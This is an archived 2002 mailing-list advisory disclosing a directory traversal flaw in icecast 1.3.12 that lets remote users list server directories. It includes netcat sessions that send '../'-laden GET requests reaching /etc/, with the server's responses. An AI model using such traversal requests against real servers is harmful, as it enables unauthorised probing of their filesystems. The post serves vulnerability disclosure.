Vulnerability Development mailing list archives

VANED LABS: icecast filesystem disclosure

From: glaive () VANED NET
Date: Tue, 9 Jul 2002 13:39:03 -0500

list_directory() makes no effort to constrain the request to the static
directory.  Icecast allows for remote probing of the underlying
filesystem structure.  (on a side note, this can also be used to list
files with a .mp3 extension anywhere on the system.  send_file() does do
traversal checking.)

% nc icecast.host 8000
GET /file/../../../../../../../../nonexistent/ HTTP/1.0

HTTP/1.0 404 Not Found
Server: icecast/1.3.12
Connection: close
Content-Type: text/html

...

% nc icecast.host 8000
GET /file/../../../../../../../../etc/ HTTP/1.0

HTTP/1.0 200 OK
Server: icecast/1.3.12
Connection: close
Content-Type: text/html

...

Current thread:

VANED LABS: icecast filesystem disclosure glaive (Jul 09)
- <Possible follow-ups>
- Re: VANED LABS: icecast filesystem disclosure matt (Jul 16)